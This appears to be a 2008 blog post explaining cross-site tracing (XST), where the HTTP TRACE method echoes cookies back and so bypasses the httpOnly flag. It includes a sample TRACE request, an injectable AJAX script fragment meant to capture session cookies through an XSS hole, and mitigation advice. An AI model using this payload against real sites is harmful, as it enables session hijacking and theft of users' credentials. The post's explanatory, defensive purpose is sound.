Cross site tracing (XST) is a technique used to circumvent Microsoft's httpOnly flag. The httpOnly flag keeps client-side scripts from reading cookie values. The HTTP TRACE method is a debugging function that echoes back whatever is sent to it in the trace request. For example:
TRACE / HTTP/1.1
Host: mysite.com
Cookie: Auth-cookie.....
would echo the entire Cookie header back to the requester. Since no script accessed the cookie, the httpOnly flag did not protect it. An attacker could use an existing CSS (cross-site scripting) vulnerability to insert the following AJAX code into a website.
<script>
var xhr;
var url = "http://mysite.com";
try {
    xhr = new ActiveXObject('Msxml2.XMLHTTP');
}
catch (e) {
    try {
        xhr = new ActiveXObject('Microsoft.XMLHTTP');
    }
    catch (e2) {
        try {
            xhr = new XMLHttpRequest();
        }
        catch (e3) { xhr = false; }
    }
}
xhr.open('TRACE', url, true);
xhr.send(null);
// collect the response and send it to a site that you control
</script>
The above code would use AJAX to send a TRACE request to the server hosting the website. The browser would send any cookie information that it holds for the website. The server would then echo back the information that was sent to it by the browser, including the cookie, and the AJAX script could collect the response and send it to a page controlled by the attacker. This is bad because the attacker now has access to important session information.
Attack Mitigation:
1. Disable TRACE on your web servers.
2. Luckily for us, Firefox and IE have disabled AJAX TRACE requests, so using one of these browsers will stop this attack via AJAX. It is still possible to execute the attack using other methods like ActiveX, though.
For further explanation see: http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf
Tuesday, May 27, 2008